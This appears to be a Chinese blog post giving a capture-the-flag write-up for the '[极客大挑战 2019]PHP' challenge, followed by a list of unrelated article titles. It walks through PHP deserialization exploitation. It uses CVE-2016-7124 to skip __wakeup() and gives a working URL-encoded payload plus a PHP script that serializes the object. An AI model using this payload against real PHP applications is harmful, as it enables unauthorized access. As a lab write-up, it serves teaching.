当前位置：首页 > news >正文

[极客大挑战 2019]PHP

news 2026/2/10 17:12:07

1.通过目录扫描找到它的备份文件，这里的备份文件是它的源码。

2.源码当中涉及到的关键点就是魔术函数以及序列化与反序列化。

我们提交的select参数会被进行反序列化，我们要构造符合输出flag条件的序列化数据。

但是，这里要注意的就是我们提前序列化好的数据，在进行反序列化之前，会执行wakeup函数，而这里一旦执行wakeup函数，就会把我们的参数给改了，那就会不满足输出flag的条件。所以这里需要绕过这个wakeup函数，需要利用的就是绕过wakeup函数的漏洞。

利用CVE-2016-7124漏洞绕过__wakeup()函数

CVE-2016-7124：当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup()的执行。

这是正常的：O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

改成可以绕过的：O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

把表示属性个数的值修改为大于实际的即可。

但是直接把这个构造的数据提交还是不行，因为

private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，类名和字段名前面都会加上一个url编码为%00的字符前缀，但是这个前缀是不可见的，并且在复制的时候会丢失。字符串长度也包括所加前缀的长度，所以复制下来之后再去添加即可。

?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;s:3:%22100%22;}

3.序列化的代码

总结：反序列化对象的时候，会触发wakeup函数，之后对象销毁还会触发destruct函数，但是不会触发construct函数。

<?php
class Name{
private $username = 'admin';
private $password = '100';#这里也可以换成数字100
}
$name = new Name;
print(serialize($name));
?>

[极客大挑战 2019]PHP

1.通过目录扫描找到它的备份文件，这里的备份文件是它的源码。

2.源码当中涉及到的关键点就是魔术函数以及序列化与反序列化。

3.序列化的代码

相关文章：

[极客大挑战 2019]PHP

数据结构之跳跃表

搜维尔科技：动作捕捉解决方案：销售、服务、培训和支持

数据库管理-第184期 23ai:干掉MongoDB的不一定是另一个JSON数据库（20240507）

刷代码随想录有感（58）：二叉树的最近公共祖先

[开发|安卓] Android Studio 开发环境配置

开发 Chrome 浏览器插件入门

在数字化转型的浪潮中，CBDB百数服务商如何破浪前行？

程序员的实用神器

spss 导入数据的时候用于确定数据类型的值所在的百分比95%是什么意思，数据分析，医学数据分析

Python进阶之-上下文管理器

什么年代了，还在拿考勤说事

泰迪智能科技中职大数据实验室建设（职业院校大数据实验室建设指南）

Qt QThreadPool线程池

无人机+三维建模：倾斜摄影技术详解

Window（Qt/Vs）软件添加版本信息

工厂模式+策略模式完成多种登录模式的实现

赋能企业数字化转型 - 易点易动固定资产系统与飞书实现协同管理

Sectigo 通配符SSL证书的优势分析！

nuxt2路由，以及重构以前项目，路由使用

linux之kylin系统nginx的安装

23-Oracle 23 ai 区块链表（Blockchain Table）

工程地质软件市场：发展现状、趋势与策略建议

（二）原型模式

数据链路层的主要功能是什么

CRMEB 框架中 PHP 上传扩展开发：涵盖本地上传及阿里云 OSS、腾讯云 COS、七牛云

SpringCloudGateway 自定义局部过滤器

JVM暂停（Stop-The-World，STW）的原因分类及对应排查方案

redis和redission的区别

前端高频面试题2：浏览器/计算机网络